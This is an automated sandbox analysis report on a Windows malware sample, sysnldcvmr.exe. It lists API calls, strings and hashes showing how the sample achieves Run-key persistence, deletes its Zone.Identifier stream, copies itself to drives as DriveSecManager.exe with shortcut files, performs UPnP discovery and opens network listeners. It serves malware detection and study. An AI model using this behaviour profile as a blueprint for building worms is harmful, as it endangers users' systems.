4057a4 5765->5768 5766->5765 5767->5765 5768->5727 5772 4048c4 5769->5772 5770 40490d 5770->5746 5771 404911 iswalpha 5771->5772 5773 40492c iswdigit 5771->5773 5772->5770 5772->5771 5772->5773 5773->5772 5774 40d5f0 5780 401470 5774->5780 5776 40d604 5777 40d62f 5776->5777 5778 40d615 WaitForSingleObject 5776->5778 5779 401330 8 API calls 5778->5779 5779->5777 5781 401483 5780->5781 5782 401572 5780->5782 5781->5782 5783 409d90 7 API calls 5781->5783 5782->5776 5784 401498 CreateEventA socket 5783->5784 5785 4014d5 5784->5785 5786 4014cf 5784->5786 5785->5782 5788 4014e2 htons setsockopt bind 5785->5788 5787 401330 8 API calls 5786->5787 5787->5785 5789 401546 5788->5789 5790 401558 CreateThread 5788->5790 5791 401330 8 API calls 5789->5791 5790->5782 5793 401100 20 API calls _invalid_parameter 5790->5793 5792 40154c 5791->5792 5792->5776 6048 40cc30 6053 40cc90 6048->6053 6051 40cc5e 6052 40cc90 send 6052->6051 6054 40cca1 send 6053->6054 6055 40cc43 6054->6055 6056 40ccbe 6054->6056 6055->6051 6055->6052 6056->6054 6056->6055 6057 40ceb0 6062 40ceb4 6057->6062 6058 40b200 5 API calls 6058->6062 6059 40ced0 WaitForSingleObject 6061 40cef5 6059->6061 6059->6062 6060 40cad0 207 API calls 6060->6062 6062->6058 6062->6059 6062->6060 6062->6061 5794 40ee74 5795 40ee7c 5794->5795 5796 40ef30 5795->5796 5800 40f0b1 5795->5800 5799 40eeb5 5799->5796 5804 40ef9c RtlUnwind 5799->5804 5801 40f0e2 5800->5801 5803 40f0c6 5800->5803 5801->5799 5802 40f151 NtQueryVirtualMemory 5802->5801 5803->5801 5803->5802 5805 40efb4 5804->5805 5805->5799 6063 406a39 6065 4069df 6063->6065 6064 406a0f lstrcmpiW 6064->6065 6065->6064 6066 406b8a FindNextFileW 6065->6066 6069 406a76 PathMatchSpecW 6065->6069 6070 406af4 PathFileExistsW 6065->6070 6076 406570 11 API calls 6065->6076 6067 4069b3 lstrcmpW 6066->6067 6068 406ba6 FindClose 6066->6068 6067->6065 6071 4069c9 lstrcmpW 6067->6071 6073 406bb3 6068->6073 6069->6065 6072 406a97 wsprintfW SetFileAttributesW DeleteFileW 6069->6072 6070->6065 6074 406b0a wsprintfW wsprintfW 6070->6074 6071->6065 6072->6065 6074->6065 6075 406b74 MoveFileExW 6074->6075 6075->6066 6076->6065 5806 40757a ExitThread 5807 40ee7c 5808 40ee9a 5807->5808 5811 40ef30 5807->5811 5809 40f0b1 NtQueryVirtualMemory 5808->5809 5810 40eeb5 5809->5810 5810->5811 5812 40ef9c RtlUnwind 5810->5812 5812->5810 5813 405f7d 5815 405f11 5813->5815 5814 40a1b0 _invalid_parameter 3 API calls 5816 405f88 LeaveCriticalSection 5814->5816 5817 405f66 memcpy 5815->5817 5818 405f7b 5815->5818 5817->5818 5818->5814

                                                                                                                    Executed Functions

                                                                                                                    Function 00407590 Relevance: 114.1, APIs: 50, Strings: 15, Instructions: 351sleepfilesynchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040759E
                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
                                                                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
                                                                                                                    • PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
                                                                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                                                                    • wcscmp.NTDLL ref: 00407663
                                                                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                                                                    • API String ID: 4172876685-2783337622
                                                                                                                    • Opcode ID: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
                                                                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                                                                    • Opcode Fuzzy Hash: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
                                                                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

                                                                                                                    Non-executed Functions

                                                                                                                    Function 004066B0 Relevance: 79.1, APIs: 35, Strings: 10, Instructions: 305fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 59 4066b0-4066c5 _chkstk 60 4066c7-4066c9 59->60 61 4066ce-406780 wsprintfW * 5 PathFileExistsW 59->61 62 406bb9-406bbc 60->62 63 406782-4067a3 call 40e770 61->63 64 4067c4-4067d3 PathFileExistsW 61->64 63->64 75 4067a5-4067be SetFileAttributesW DeleteFileW 63->75 66 406874-406883 PathFileExistsW 64->66 67 4067d9-4067e8 PathFileExistsW 64->67 68 406885-40688b 66->68 69 4068ca-4068eb FindFirstFileW 66->69 71 406809-406818 PathFileExistsW 67->71 72 4067ea-406803 SetFileAttributesW DeleteFileW 67->72 73 4068a5-4068b8 call 406460 68->73 74 40688d-4068a3 call 406460 68->74 76 4068f1-4069a9 69->76 77 406bb3 69->77 78 40681a-40682b CreateDirectoryW 71->78 79 40683c-40684b PathFileExistsW 71->79 72->71 90 4068bb-4068c4 SetFileAttributesW 73->90 74->90 75->64 82 4069b3-4069c7 lstrcmpW 76->82 77->62 78->79 83 40682d-406836 SetFileAttributesW 78->83 79->66 84 40684d-406863 CopyFileW 79->84 87 4069c9-4069dd lstrcmpW 82->87 88 4069df 82->88 83->79 84->66 89 406865-40686e SetFileAttributesW 84->89 87->88 91 4069e4-4069f5 87->91 92 406b8a-406ba0 FindNextFileW 88->92 89->66 90->69 94 406a06-406a0d 91->94 95 4069f7-406a00 91->95 92->82 93 406ba6-406bad FindClose 92->93 93->77 96 406a3b-406a44 94->96 97 406a0f-406a2c lstrcmpiW 94->97 95->94 100 406a46 96->100 101 406a4b-406a5c 96->101 98 406a30-406a37 97->98 99 406a2e 97->99 98->96 99->95 100->92 102 406a6d-406a74 101->102 103 406a5e-406a67 101->103 104 406ae4-406aed 102->104 105 406a76-406a93 PathMatchSpecW 102->105 103->102 106 406af4-406b03 PathFileExistsW 104->106 107 406aef 104->107 108 406a95 105->108 109 406a97-406add wsprintfW SetFileAttributesW DeleteFileW 105->109 110 406b05 106->110 111 406b0a-406b5a wsprintfW * 2 106->111 107->92 108->103 109->104 110->92 112 406b74-406b84 MoveFileExW 111->112 113 406b5c-406b72 call 406570 111->113 112->92 113->92
                                                                                                                    APIs
                                                                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                                                                    • wsprintfW.USER32 ref: 00406768
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                    • API String ID: 2467965697-1256475382
                                                                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                                                                    Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 572 406570-4065bf CreateDirectoryW wsprintfW FindFirstFileW 573 4065c5-4065d9 lstrcmpW 572->573 574 40669f-4066a2 572->574 575 4065f1 573->575 576 4065db-4065ef lstrcmpW 573->576 578 40666c-406682 FindNextFileW 575->578 576->575 577 4065f3-40663c wsprintfW * 2 576->577 579 406656-406666 MoveFileExW 577->579 580 40663e-406654 call 406570 577->580 578->573 581 406688-406699 FindClose RemoveDirectoryW 578->581 579->578 580->578 581->574
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                                                                    • wsprintfW.USER32 ref: 00406595
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                                                                    • API String ID: 92872011-32713442
                                                                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1603358586-0
                                                                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                                                                    Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                    • String ID: 239.255.255.250
                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4174406920-0
                                                                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                                                                    Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 107502007-0
                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                                                                    Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                    Strings
                                                                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                                                                    Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                    • String ID: oA$ oA$ oA
                                                                                                                    • API String ID: 2850889275-3725432611
                                                                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                                                                    Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
